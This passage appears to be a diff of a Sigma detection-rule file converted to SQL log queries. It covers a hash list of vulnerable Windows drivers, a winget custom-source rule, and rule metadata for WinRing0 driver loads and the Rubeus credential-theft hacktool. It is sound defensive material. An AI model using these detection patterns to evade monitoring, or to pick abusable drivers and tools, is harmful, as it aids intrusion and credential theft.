'd702d88b12233be9413446c445f22fda4a92a1d9', '910cb12aa49e9f35ecc4907e8304adf0dcca8cf1', '643383938d5e0d4fd30d302af3e9293a4798e392', 'c4ed28fdfba7b8a8dfe39e591006f25d39990f07', 'b0032b8d8e6f4bd19a31619ce38d8e010f29a816', 'db6245578ec57bd767b27ecf8085095e1c8e5a6e', '166759fd511613414d3213942fe2575b926a6226', '02a8b74899591da7b7f49c0450328d39b939d7e4', '98ceed786f79288becc08c3b82c57e8d4bfa1bca', 'f6b3577ea4b1a5641ae3421151a26268434c3db8', '4de33d03fee52f396a1c788000ca868d56ac30de', 'c6920171fa6dff2c17eb83befb5fd28e8dddf5f0', 'fbc6d2448739ddec35bb5d6c94b46df4148f648d', '6b54f8f137778c1391285fee6150dfa58a8120b1', '943593e880b4d340f2548548e6e673ef6f61eed3', '5ac4d0e2381fc4a8aebe94a0fb6fe5e7558e4dcd', 'e44297a2b750ec1958bef265e2f1ae6fa4323b28', 'aa2ea973bb248b18973e57339307cfb8d309f687', '3a5d176c50f97b71d139767ed795d178623f491d', '25d812a5ece19ea375178ef9d60415841087726e', '3795e32592ab6d8074b6f7ad33759c6a39b0df07', 'fc121ed6fb37e97a004b6faf217435b772dfc4c0', 'ab2b8602e4baef828b58b995d0889a8e5b8dbd02', 'cf040040628b58f4a811f98c2690913c1e8e4e3c', '3296844d22c87dd5eba3aa378a8242b41d59db7a', 'bc47e15537fa7c32dfefd23168d7e1741f8477ed', 'cb22723faa5ae2809476e5c5e9b9a597b26cab9b', 'f3c5e723ae009b336cd2719137b8cd194c9ee51d', '41f2d0f9863bce8920c207b1ef5d3d32b603edef', 'eb93d2f564fea9b3dc350f386b45de2cd9a3e001', '3cd037fbba8aae82c1b111c9f8755349c98bcb3c', '9401389fba314d1810f83edce33c37e84a78e112', '7eb34cc1fcffb4fdb5cb7e97184dd64a65cb9371', '16d7ecf09fc98798a6170e4cef2745e0bee3f5c7', 'fcd615df88645d1f57ff5702bd6758b77efea6d0', 'f3db629cfe37a73144d5258e64d9dd8b38084cf4', 'a00e444120449e35641d58e62ed64bb9c9f518d2', '38571f14fc014487194d1eecfa80561ee8644e09', '4d41248078181c7f61e6e4906aa96bbdea320dc2', '3599ea2ac1fa78f423423a4cf90106ea0938dde8', '3d6d53b0f1cc908b898610227b9f1b9352137aba', '4c18754dca481f107f0923fb8ef5e149d128525d', '8c377ab4eebc5f4d8dd7bb3f90c0187dfdd3349f', 'cde32654a041fedc7b0fa1083f6005b950760062', '5fb9421be8a8b08ec395d05e00fd45eb753b593a', 'b480c54391a2a2f917a44f91a5e9e4590648b332', '4f7a8e26a97980544be634b26899afbefb0a833c', 'c1d5cf8c43e7679b782630e93f5e6420ca1749a7', 'a7e9a4686aa7291331e2c8708882c8d81d05264f', '7ba19a701c8af76988006d616a5f77484c13cb0a', '4243dbbf6e5719d723f24d0f862afd0fcb40bc35', '00b4e8b7644d1bf93f5ddb5740b444b445e81b02', 'fd833f3fe2fa396878033b9e6054725248bf9881', 'db446af0e34259e95f4db112a9f06177e1eef4e0', '39d7b121bc654a0de891225e0f8b7b5537c24931', 'd0a228ed8af190dec0c1a812e212f5e68ee3b43e', '7d2fc1a6729521e5c76f659e4c398e2061f7ed5e', 'f999709e5b00a68a0f4fa912619fe6548ad0c42d', '06232f7ea7ea24102d452427aedbbc8b8e188a0c', 'a380aeb3ffaecc53ca48bb1d4d622c46f1de7962', '4927d843577bada119a17b249ff4e7f5e9983a92', 'e5114fd50904c7fb75d8c86367b9a2dd4f79dfb1', '3ccf1f3ac636a5e21b39ede48ff49fa23e05413f', '755349d56cdd668ca22eebc4fc89f0cccef47327', '56af49e030eb85528e82849d7d1b6147f3c4973e', '45a9f95a7a018925148152b888d09d478d56bbf5', '540b9f9a232b9d597138b8e0f33d83f5f6e247af', 'bdfb25cc4ed569dc0d5849545eb4abe08539029f', '28da2ac7c82b999c53f99d55331cfa3624a0bc6f', '5d5f92fba0f39826b527f335a7cca7d363758410', '1858ab7ad1947f5c24b9c913cd975e6dbb536865', '0f2aa3bfdfd699e258382ea1b3c1db1ad7211023', '886a9c16b871da42cdb54c6738a8e088be8b989f', 'c24883645c0589f6171e8ee10080750ac66d75e6', '36d3b09e19477d807a6a5efff89aa6cc8b71bdeb', 'e58dd758e28218e1edb33cd88bb97504972ee221', 'd782ef79266179d2247807857877fabb2e402be5') OR sha256 IN ('04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162', '05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748', '4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA', '6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA', '8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F', 'B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414', '7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D', '7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA', '42579A759F3F95F20A2C51D5AC2047A2662A2675B3FB9F46C1ED7F23393A0F00', '2DA330A2088409EFC351118445A824F11EDBE51CF3D653B298053785097FE40E', '436CCAB6F62FA2D29827916E054ADE7ACAE485B3DE1D3E5C6C62D3DEBF1480E7', 'B4D47EA790920A4531E3DF5A4B4B0721B7FEA6B49A35679F0652F1E590422602', 'DDE6F28B3F7F2ABBEE59D4864435108791631E9CB4CDFB1F178E5AA9859956D8', 'B48A309EE0960DA3CAAAAF1E794E8C409993AEB3A2B64809F36B97AAC8A1E62A', '025E7BE9FCEFD6A83F4471BBA0C11F1C11BD5047047D26626DA24EE9A419CDC4', '2AA1B08F47FBB1E2BD2E4A492F5D616968E703E1359A921F62B38B8E4662F0C4', 'ECE0A900EA089E730741499614C0917432246CEB5E11599EE3A1BB679E24FD2C', 'F40435488389B4FB3B945CA21A8325A51E1B5F80F045AB019748D0EC66056A8B', '2A652DE6B680D5AD92376AD323021850DAB2C653ABF06EDF26120F7714B8E08A', '950A4C0C772021CEE26011A92194F0E58D61588F77F2873AA0599DFF52A160C9', '0AAFA9F47ACF69D46C9542985994FF5321F00842A28DF2396D4A3076776A83CB', '47F08F7D30D824A8F4BB8A98916401A37C0FD8502DB308ABA91FE3112B892DCC', 'B9A4E40A5D80FEDD1037EAED958F9F9EFED41EB01ADA73D51B5DCD86E27E0CBF', '5C04C274A708C9A7D993E33BE3EA9E6119DC29527A767410DBAF93996F87369A', '0040153302B88BEE27EB4F1ECA6855039E1A057370F5E8C615724FA5215BADA3', '3326E2D32BBABD69FEB6024809AFC56C7E39241EBE70A53728C77E80995422A5', '36B9E31240AB0341873C7092B63E2E0F2CAB2962EBF9B25271C3A1216B7669EB', '29E0062A017A93B2F2F5207A608A96DF4D554C5DE976BD0276C2590A03BD3E94', '45ABDBCD4C0916B7D9FAAF1CD08543A3A5178871074628E0126A6EDA890D26E0', '50DB5480D0392A7DD6AB5DF98389DC24D1ED1E9C98C9C35964B19DABCD6DC67F', '607DC4C75AC7AEF82AE0616A453866B3B358C6CF5C8F9D29E4D37F844306B97C', '61D6E40601FA368800980801A662A5B3B36E3C23296E8AE1C85726A56EF18CC8', '74A846C61ADC53692D3040AFF4C1916F32987AD72B07FE226E9E7DBEFF1036C4', '76FB4DEAEE57EF30E56C382C92ABFFE2CF616D08DBECB3368C8EE6B02E59F303', '81939E5C12BD627FF268E9887D6FB57E95E6049F28921F3437898757E7F21469', '9790A7B9D624B2B18768BB655DDA4A05A9929633CEF0B1521E79E40D7DE0A05B', '9A1D66036B0868BBB1B2823209FEDEA61A301D5DD245F8E7D390BD31E52D663E', 'AA9AB1195DC866270E984F1BED5E1358D6EF24C515DFDB6C2A92D1E1B94BF608', 'AF095DE15A16255CA1B2C27DAD365DFF9AC32D2A75E8E288F5A1307680781685', 'D5586DC1E61796A9AE5E5D1CED397874753056C3DF2EB963A8916287E1929A71', 'D8459F7D707C635E2C04D6D6D47B63F73BA3F6629702C7A6E0DF0462F6478AE2', 'E81230217988F3E7EC6F89A06D231EC66039BDBA340FD8EBB2BBB586506E3293', 'F88EBB633406A086D9CCA6BC8B66A4EA940C5476529F9033A9E0463512A23A57', '1C8DFA14888BB58848B4792FB1D8A921976A9463BE8334CFF45CC96F1276049A', '22418016E980E0A4A2D01CA210A17059916A4208352C1018B0079CCB19AAF86A', '405472A8F9400A54BB29D03B436CCD58CFD6442FE686F6D2ED4F63F002854659', '49F75746EEBE14E5DB11706B3E58ACCC62D4034D2F1C05C681ECEF5D1AD933BA', '4A3D4DB86F580B1680D6454BAEE1C1A139E2DDE7D55E972BA7C92EC3F555DCE2', '4AB41816ABBF14D59E75B7FAD49E2CB1C1FEB27A3CB27402297A2A4793FF9DA7', '54841D9F89E195196E65AA881834804FE3678F1CF6B328CAB8703EDD15E3EC57', '5EE292B605CD3751A24E5949AAE615D472A3C72688632C3040DC311055B75A92', '76B86543CE05540048F954FED37BDDA66360C4A3DDB8328213D5AEF7A960C184', '7F190F6E5AB0EDAFD63391506C2360230AF4C2D56C45FC8996A168A1FC12D457', '845F1E228DE249FC1DDF8DC28C39D03E8AD328A6277B6502D3932E83B879A65A', '84BF1D0BCDF175CFE8AEA2973E0373015793D43907410AE97E2071B2C4B8E2D4', '8EF0AD86500094E8FA3D9E7D53163AA6FEEF67C09575C169873C494ED66F057F', 'A56C2A2425EB3A4260CC7FC5C8D7BED7A3B4CD2AF256185F24471C668853AEE8', 'AC3F613D457FC4D44FA27B2E0B1BAA62C09415705EFB5A40A4756DA39B3AC165', 'B1334A71CC73B3D0C54F62D8011BEC330DFC355A239BF94A121F6E4C86A30A2E', 'B47BE212352D407D0EF7458A7161C66B47C2AEC8391DD101DF11E65728337A6A', 'B9B3878DDC5DFB237D38F8D25067267870AFD67D12A330397A8853209C4D889C', 'DB90E554AD249C2BD888282ECF7D8DA4D1538DD364129A3327B54F8242DD5653', 'E61A54F6D3869B43C4ECEAC3016DF73DF67CCE03878C5A6167166601C5D3F028', '3871E16758A1778907667F78589359734F7F62F9DC953EC558946DCDBE6951E3', '80CBBA9F404DF3E642F22C476664D63D7C229D45D34F5CD0E19C65EB41BECEC3', 'BB50818A07B0EB1BD317467139B7EB4BAD6CD89053FECDABFEAE111689825955', 'FF6729518A380BF57F1BC6F1EC0AA7F3012E1618B8D9B0F31A61D299EE2B4339', '3A5EC83FE670E5E23AEF3AFA0A7241053F5B6BE5E6CA01766D6B5F9177183C25', '61A1BDDDD3C512E681818DEBB5BEE94DB701768FC25E674FCAD46592A3259BD0', '07B6D69BAFCFD767F1B63A490A8843C3BB1F8E1BBEA56176109B5743C8F7D357', '21CCDD306B5183C00ECFD0475B3152E7D94B921E858E59B68A03E925D1715F21', '2D83CCB1AD9839C9F5B3F10B1F856177DF1594C66CBBC7661677D4B462EBF44D', 'F581DECC2888EF27EE1EA85EA23BBB5FB2FE6A554266FF5A1476ACD1D29D53AF', 'F8965FDCE668692C3785AFA3559159F9A18287BC0D53ABB21902895A8ECF221B', '3D23BDBAF9905259D858DF5BF991EB23D2DC9F4ECDA7F9F77839691ACEF1B8C4', 'DD4A1253D47DE14EF83F1BC8B40816A86CCF90D1E624C5ADF9203AE9D51D4097', '509628B6D16D2428031311D7BD2ADD8D5F5160E9ECC0CD909F1E82BBBB3234D6', '525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD', '6DE84CAA2CA18673E01B91AF58220C60AECD5CCCF269725EC3C7F226B2167492', '09BEDBF7A41E0F8DABE4F41D331DB58373CE15B2E9204540873A1884F38BDDE1', '101402D4F5D1AE413DED499C78A5FCBBC7E3BAE9B000D64C1DD64E3C48C37558', '131D5490CEB9A5B2324D8E927FEA5BECFC633015661DE2F4C2F2375A3A3B64C6', '1DDFE4756F5DB9FB319D6C6DA9C41C588A729D9E7817190B027B38E9C076D219', '1E8B0C1966E566A523D652E00F7727D8B0663F1DFDCE3B9A09B9ADFAEF48D8EE', '2BBE65CBEC3BB069E92233924F7EE1F95FFA16173FCEB932C34F68D862781250', '30706F110725199E338E9CC1C940D9A644D19A14F0EB8847712CBA4CACDA67AB', '3124B0411B8077605DB2A9B7909D8240E0D554496600E2706E531C93C931E1B5', '38FA0C663C8689048726666F1C5E019FEAA9DA8278F1DF6FF62DA33961891D2A', '39CFDE7D401EFCE4F550E0A9461F5FC4D71FA07235E1336E4F0B4882BD76550E', '3D9E83B189FCF5C3541C62D1F54A0DA0A4E5B62C3243D2989AFC46644056C8E3', '3F2FDA9A7A9C57B7138687BBCE49A2E156D6095DDDABB3454EA09737E02C3FA5', '47F0CDAA2359A63AD1389EF4A635F1F6EEE1F63BDF6EF177F114BDCDADC2E005', '50D5EAA168C077CE5B7F15B3F2C43BD2B86B07B1E926C1B332F8CB13BD2E0793', '56A3C9AC137D862A85B4004F043D46542A1B61C6ACB438098A9640469E2D80E7', '591BD5E92DFA0117B3DAA29750E73E2DB25BAA717C31217539D30FFB1F7F3A52', '5D530E111400785D183057113D70623E17AF32931668AB7C7FC826F0FD4F91A3', '6F1FF29E2E710F6D064DC74E8E011331D807C32CC2A622CBE507FD4B4D43F8F4', '79E2D37632C417138970B4FEBA91B7E10C2EA251C5EFE3D1FC6FA0190F176B57', '85866E8C25D82C1EC91D7A8076C7D073CCCF421CF57D9C83D80D63943A4EDD94', '89B0017BC30CC026E32B758C66A1AF88BD54C6A78E11EC2908FF854E00AC46BE', '9254F012009D55F555418FF85F7D93B184AB7CB0E37AECDFDAB62CFE94DEA96B', '984A77E5424C6D099051441005F2938AE92B31B5AD8F6521C6B001932862ADD7', '98B734DDA78C16EBCAA4AFEB31007926542B63B2F163B2F733FA0D00DBB344D8', '99F4994A0E5BD1BF6E3F637D3225C69FF4CD620557E23637533E7F18D7D6CBA1', '9C10E2EC4F9EF591415F9A784B93DC9C9CDAFA7C69602C0DC860C5B62222E449', 'A961F5939088238D76757669A9A81905E33F247C9C635B908DAAC146AE063499', 'A9706E320179993DADE519A83061477ACE195DAA1B788662825484813001F526', 'B7A20B5F15E1871B392782C46EBCC897929443D82073EE4DCB3874B6A5976B5D', 'CC586254E9E89E88334ADEE44E332166119307E79C2F18F6C2AB90CE8BA7FC9B', 'CD4A249C3EF65AF285D0F8F30A8A96E83688486AAB515836318A2559757A89BB', 'CF4B5FA853CE809F1924DF3A3AE3C4E191878C4EA5248D8785DC7E51807A512B', 'D0BD1AE72AEB5F3EABF1531A635F990E5EAAE7FDD560342F915F723766C80889', 'D8B58F6A89A7618558E37AFC360CD772B6731E3BA367F8D58734ECEE2244A530', 'D92EAB70BCECE4432258C9C9A914483A2267F6AB5CE2630048D3A99E8CB1B482', 'E005E8D183E853A27AD3BB56F25489F369C11B0D47E3D4095AAD9291B3343BF1', 'E68D453D333854787F8470C8BAEF3E0D082F26DF5AA19C0493898BCF3401E39A', 'E83908EBA2501A00EF9E74E7D1C8B4FF1279F1CD6051707FD51824F87E4378FA', 'EF86C4E5EE1DBC4F81CD864E8CD2F4A2A85EE4475B9A9AB698A4AE1CC71FBEB0', 'F088B2BA27DACD5C28F8EE428F1350DCA4BC7C6606309C287C801B2E1DA1A53D', 'FD8669794C67B396C12FC5F08E9C004FDF851A82FAF302846878173E4FBECB03', '91314768DA140999E682D2A290D48B78BB25A35525EA12C1B1F9634D14602B2C', 'F0605DDA1DEF240DC7E14EFA73927D6C6D89988C01EA8647B671667B2B167008', '6CB51AE871FBD5D07C5AAD6FF8EEA43D34063089528603CA9CEB8B4F52F68DDC', 'DB2A9247177E8CDD50FE9433D066B86FFD2A84301AA6B2EB60F361CFFF077004', '7EC93F34EB323823EB199FBF8D06219086D517D0E8F4B9E348D7AFD41EC9FD5D', '7049F3C939EFE76A5556C2A2C04386DB51DAF61D56B679F4868BB0983C996EBB', '7877C1B0E7429453B750218CA491C2825DAE684AD9616642EFF7B41715C70ACA', '159E7C5A12157AF92E0D14A0D3EA116F91C09E21A9831486E6DC592C93C10980', '3243AAB18E273A9B9C4280A57AECEF278E10BFFF19ABB260D7A7820E41739099', '7CFA5E10DFF8A99A5D544B011F676BC383991274C693E21E3AF40CF6982ADB8C', 'C9B49B52B493B53CD49C12C3FA9553E57C5394555B64E32D1208F5B96A5B8C6E', '3EC5AD51E6879464DFBCCB9F4ED76C6325056A42548D5994BA869DA9C4C039A8', '47EAEBC920CCF99E09FC9924FEB6B19B8A28589F52783327067C9B09754B5E84', '80599708ce61ec5d6dcfc5977208a2a0be2252820a88d9ba260d8cdf5dc7fbe4', '9091e044273ff624585235ac885eb2b05dfb12f3022dcf535b178ff1b2e012d1', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '41cceace9751dce2b6ecaedc9a2d374fbb6458cf93b00a1dcd634ad0bc54ef89', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', 'e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', '39937d239220c1b779d7d55613de2c0a48bd6e12e0214da4c65992b96cf591df', '7ed26a593524a2a92ffcfb075a42bb4fa4775ffbf83af98525244a4710886ead', 'aa717e9ab4d614497df19f602d289a6eddcdba8027c71bcc807780a219347d16', 'ff5f6048a3d6f6738b60e911e3876fcbdc9a02ec9862f909345c8a50fd4cc0a7', '952199C28332BC90CFD74530A77EE237967ED32B3C71322559C59F7A42187DC4', '9529EFB1837B1005E5E8F477773752078E0A46500C748BC30C9B5084D04082E6', 'A7B000ABBCC344444A9B00CFADE7AA22AB92CE0CADEC196C30EB1851AE4FA062', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', 'fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2', 'ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', '3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7', 'b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038', 'ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89', '73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e', '87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3', '2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', 'e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf', '1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea', 'd84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5', '5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a', '0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003', '26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7', '42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498', '1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22', '9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de', 'fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', '175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347', '8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026', '52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', '5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', '7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', '8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', '2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", - "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], 